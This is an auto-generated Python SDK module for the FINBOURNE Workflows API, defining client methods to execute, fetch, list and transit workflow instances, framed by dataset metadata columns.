5ace779b2c34a6202932b08a7bb5859064e9665c
| 49,696
|
py
|
Python
|
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
sdk/lusid_workflows/api/workflows_api.py
|
finbourne/workflows-sdk-generated-preview
|
41201c402e8d006740d278339cb80283000e4ce6
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
FINBOURNE Workflows API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.1.25
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid_workflows.api_client import ApiClient
from lusid_workflows.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class WorkflowsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def execute_workflow(self, workflow_code, execute_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Execute workflow # noqa: E501
This will create a new workflow instance for the specified workflow # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.execute_workflow(workflow_code, execute_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_code: Workflow Code (required)
:type workflow_code: str
:param execute_workflow_request: Data associated with execute request (required)
:type execute_workflow_request: ExecuteWorkflowRequest
:param correlation_id: Optional. This id can be used to correlate a workflow instance with any entity (e.g. a custom entity or other workflow instance) and also to retrieve and transit workflow instances
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.execute_workflow_with_http_info(workflow_code, execute_workflow_request, **kwargs) # noqa: E501
def execute_workflow_with_http_info(self, workflow_code, execute_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Execute workflow # noqa: E501
This will create a new workflow instance for the specified workflow # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.execute_workflow_with_http_info(workflow_code, execute_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_code: Workflow Code (required)
:type workflow_code: str
:param execute_workflow_request: Data associated with execute request (required)
:type execute_workflow_request: ExecuteWorkflowRequest
:param correlation_id: Optional. This id can be used to correlate a workflow instance with any entity (e.g. a custom entity or other workflow instance) and also to retrieve and transit workflow instances
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'workflow_code',
'execute_workflow_request',
'correlation_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method execute_workflow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'workflow_code' is set
if self.api_client.client_side_validation and ('workflow_code' not in local_var_params or # noqa: E501
local_var_params['workflow_code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `workflow_code` when calling `execute_workflow`") # noqa: E501
# verify the required parameter 'execute_workflow_request' is set
if self.api_client.client_side_validation and ('execute_workflow_request' not in local_var_params or # noqa: E501
local_var_params['execute_workflow_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `execute_workflow_request` when calling `execute_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_code' in local_var_params:
path_params['workflowCode'] = local_var_params['workflow_code'] # noqa: E501
query_params = []
if 'correlation_id' in local_var_params and local_var_params['correlation_id'] is not None: # noqa: E501
query_params.append(('correlationId', local_var_params['correlation_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'execute_workflow_request' in local_var_params:
body_params = local_var_params['execute_workflow_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.25'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/{workflowCode}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_workflow_instance(self, workflow_instance_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instance  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.get_workflow_instance(workflow_instance_id, async_req=True)
    >>> result = thread.get()

    :param workflow_instance_id: Unique workflow instance identifier (required)
    :type workflow_instance_id: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: WorkflowInstance
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.get_workflow_instance_with_http_info(workflow_instance_id, **options)  # noqa: E501
def get_workflow_instance_with_http_info(self, workflow_instance_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instance  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.get_workflow_instance_with_http_info(workflow_instance_id, async_req=True)
    >>> result = thread.get()

    :param workflow_instance_id: Unique workflow instance identifier (required)
    :type workflow_instance_id: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # Every keyword this endpoint accepts: its own argument plus the
    # common per-request options.
    known_params = {
        'workflow_instance_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_workflow_instance" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side validation: the path parameter is mandatory.
    if self.api_client.client_side_validation and params.get('workflow_instance_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `workflow_instance_id` when calling `get_workflow_instance`")  # noqa: E501

    path_params = {'workflowInstanceId': params['workflow_instance_id']}

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    return self.api_client.call_api(
        '/api/v1/workflows/instances/{workflowInstanceId}', 'GET',
        path_params,
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map={
            200: "WorkflowInstance",
            400: "LusidValidationProblemDetails",
            404: "str",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
def get_workflow_instance_by_correlation_id(self, correlation_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instance  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.get_workflow_instance_by_correlation_id(correlation_id, async_req=True)
    >>> result = thread.get()

    :param correlation_id: CorrelationId associated with the workflow instance (required)
    :type correlation_id: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: WorkflowInstance
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.get_workflow_instance_by_correlation_id_with_http_info(correlation_id, **options)  # noqa: E501
def get_workflow_instance_by_correlation_id_with_http_info(self, correlation_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instance  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.get_workflow_instance_by_correlation_id_with_http_info(correlation_id, async_req=True)
    >>> result = thread.get()

    :param correlation_id: CorrelationId associated with the workflow instance (required)
    :type correlation_id: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # Every keyword this endpoint accepts: its own argument plus the
    # common per-request options.
    known_params = {
        'correlation_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_workflow_instance_by_correlation_id" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side validation: the path parameter is mandatory.
    if self.api_client.client_side_validation and params.get('correlation_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `correlation_id` when calling `get_workflow_instance_by_correlation_id`")  # noqa: E501

    path_params = {'correlationId': params['correlation_id']}

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    return self.api_client.call_api(
        '/api/v1/workflows/instance/{correlationId}', 'GET',
        path_params,
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map={
            200: "WorkflowInstance",
            400: "LusidValidationProblemDetails",
            404: "str",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
def list_workflow_instances(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instances  # noqa: E501

    If no parameters are passed then all instances will be returned.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.list_workflow_instances(async_req=True)
    >>> result = thread.get()

    :param workflow_code: Optional. Workflow code
    :type workflow_code: str
    :param workflow_execution_status: Optional. Workflow execution status
    :type workflow_execution_status: str
    :param workflow_instance_state: Optional. Custom state associated with workflow instance
    :type workflow_instance_state: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: ResourceListOfWorkflowInstance
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.list_workflow_instances_with_http_info(**options)  # noqa: E501
def list_workflow_instances_with_http_info(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get workflow instances  # noqa: E501

    If no parameters are passed then all instances will be returned.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.list_workflow_instances_with_http_info(async_req=True)
    >>> result = thread.get()

    :param workflow_code: Optional. Workflow code
    :type workflow_code: str
    :param workflow_execution_status: Optional. Workflow execution status
    :type workflow_execution_status: str
    :param workflow_instance_state: Optional. Custom state associated with workflow instance
    :type workflow_instance_state: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(ResourceListOfWorkflowInstance, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # Every keyword this endpoint accepts: the optional filters plus the
    # common per-request options.
    known_params = {
        'workflow_code',
        'workflow_execution_status',
        'workflow_instance_state',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_workflow_instances" % key
            )
        params[key] = val
    del params['kwargs']

    # Build the query string from whichever optional filters were supplied.
    query_params = []
    for py_name, wire_name in (
            ('workflow_code', 'workflowCode'),
            ('workflow_execution_status', 'workflowExecutionStatus'),
            ('workflow_instance_state', 'workflowInstanceState')):
        value = params.get(py_name)
        if value is not None:
            query_params.append((wire_name, value))

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    return self.api_client.call_api(
        '/api/v1/workflows/instances', 'GET',
        {},  # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map={
            200: "ResourceListOfWorkflowInstance",
            400: "LusidValidationProblemDetails",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
def list_workflows(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get all available workflows  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.list_workflows(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: ResourceListOfWorkflow
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.list_workflows_with_http_info(**options)  # noqa: E501
def list_workflows_with_http_info(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Get all available workflows  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.list_workflows_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(ResourceListOfWorkflow, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # This endpoint takes no arguments of its own — only the common
    # per-request options are accepted.
    known_params = {
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_workflows" % key
            )
        params[key] = val
    del params['kwargs']

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    return self.api_client.call_api(
        '/api/v1/workflows', 'GET',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map={
            200: "ResourceListOfWorkflow",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
def transit_workflow(self, workflow_instance_id, transit_workflow_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Transit workflow  # noqa: E501

    This would transit the workflow instance to proceed to next step using
    WorkflowInstanceId with the attached data/context and action.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.transit_workflow(workflow_instance_id, transit_workflow_request, async_req=True)
    >>> result = thread.get()

    :param workflow_instance_id: Unique workflow instance identifier (required)
    :type workflow_instance_id: str
    :param transit_workflow_request: Data associated with the transit request (required)
    :type transit_workflow_request: TransitWorkflowRequest
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: WorkflowInstance
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.transit_workflow_with_http_info(workflow_instance_id, transit_workflow_request, **options)  # noqa: E501
def transit_workflow_with_http_info(self, workflow_instance_id, transit_workflow_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Transit workflow  # noqa: E501

    This would transit the workflow instance to proceed to next step using
    WorkflowInstanceId with the attached data/context and action.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.transit_workflow_with_http_info(workflow_instance_id, transit_workflow_request, async_req=True)
    >>> result = thread.get()

    :param workflow_instance_id: Unique workflow instance identifier (required)
    :type workflow_instance_id: str
    :param transit_workflow_request: Data associated with the transit request (required)
    :type transit_workflow_request: TransitWorkflowRequest
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # Every keyword this endpoint accepts: its own arguments plus the
    # common per-request options.
    known_params = {
        'workflow_instance_id',
        'transit_workflow_request',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method transit_workflow" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side validation: both the path parameter and the body are
    # mandatory.
    if self.api_client.client_side_validation and params.get('workflow_instance_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `workflow_instance_id` when calling `transit_workflow`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('transit_workflow_request') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `transit_workflow_request` when calling `transit_workflow`")  # noqa: E501

    path_params = {'workflowInstanceId': params['workflow_instance_id']}

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']),  # noqa: E501
        # LUSID SDK identification headers.
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.1.25',
    }

    return self.api_client.call_api(
        '/api/v1/workflows/instances/{workflowInstanceId}', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=params.get('transit_workflow_request'),
        post_params=[],
        files={},
        response_types_map={
            200: "WorkflowInstance",
            400: "LusidValidationProblemDetails",
            404: "str",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
def transit_workflow_by_correlation_id(self, correlation_id, transit_workflow_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Transit workflow  # noqa: E501

    This would transit the workflow instance to proceed to next step using
    CorrelationId with the attached data/context and action.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.transit_workflow_by_correlation_id(correlation_id, transit_workflow_request, async_req=True)
    >>> result = thread.get()

    :param correlation_id: CorrelationId associated with the workflow instance (required)
    :type correlation_id: str
    :param transit_workflow_request: Data associated with the transit request (required)
    :type transit_workflow_request: TransitWorkflowRequest
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: WorkflowInstance
    """
    # Delegate to the *_with_http_info variant, forcing data-only returns.
    options = dict(kwargs, _return_http_data_only=True)
    return self.transit_workflow_by_correlation_id_with_http_info(correlation_id, transit_workflow_request, **options)  # noqa: E501
def transit_workflow_by_correlation_id_with_http_info(self, correlation_id, transit_workflow_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Transit workflow  # noqa: E501

    This would transit the workflow instance to proceed to next step using
    CorrelationId with the attached data/context and action.
    Synchronous by default; pass ``async_req=True`` to get back a request
    thread instead (``thread.get()`` yields the result).

    >>> thread = api.transit_workflow_by_correlation_id_with_http_info(correlation_id, transit_workflow_request, async_req=True)
    >>> result = thread.get()

    :param correlation_id: CorrelationId associated with the workflow instance (required)
    :type correlation_id: str
    :param transit_workflow_request: Data associated with the transit request (required)
    :type transit_workflow_request: TransitWorkflowRequest
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request; a single
                             number (total timeout) or a (connection, read)
                             tuple.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the
                          authentication in the spec for that request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
             asynchronously.
    :rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
    """
    params = locals()

    # Every keyword this endpoint accepts: its own arguments plus the
    # common per-request options.
    known_params = {
        'correlation_id',
        'transit_workflow_request',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    }

    # Reject unknown keywords, then fold the accepted ones into `params`.
    for key, val in six.iteritems(params['kwargs']):
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method transit_workflow_by_correlation_id" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side validation: both the path parameter and the body are
    # mandatory.
    if self.api_client.client_side_validation and params.get('correlation_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `correlation_id` when calling `transit_workflow_by_correlation_id`")  # noqa: E501
    if self.api_client.client_side_validation and params.get('transit_workflow_request') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `transit_workflow_request` when calling `transit_workflow_by_correlation_id`")  # noqa: E501

    path_params = {'correlationId': params['correlation_id']}

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Accept-Encoding': "gzip, deflate, br",
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']),  # noqa: E501
        # LUSID SDK identification headers.
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.1.25',
    }

    return self.api_client.call_api(
        '/api/v1/workflows/instance/{correlationId}', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=params.get('transit_workflow_request'),
        post_params=[],
        files={},
        response_types_map={
            200: "WorkflowInstance",
            400: "LusidValidationProblemDetails",
            404: "str",
        },
        auth_settings=['oauth2'],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={},
        _request_auth=params.get('_request_auth'))
| 46.619137
| 211
| 0.617937
| 5,410
| 49,696
| 5.403142
| 0.045471
| 0.033116
| 0.051247
| 0.025863
| 0.965824
| 0.963942
| 0.952756
| 0.949711
| 0.932982
| 0.916938
| 0
| 0.012629
| 0.313265
| 49,696
| 1,065
| 212
| 46.662911
| 0.843882
| 0.472372
| 0
| 0.742616
| 1
| 0
| 0.225149
| 0.086017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031646
| false
| 0
| 0.010549
| 0
| 0.07384
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5170d937fa6d2e80e0c937a48caf5fe62b3ec90c
| 13,439
|
py
|
Python
|
driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 2
|
2021-08-10T02:38:23.000Z
|
2021-08-10T03:04:22.000Z
|
driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 1
|
2022-02-21T15:57:03.000Z
|
2022-02-21T15:57:03.000Z
|
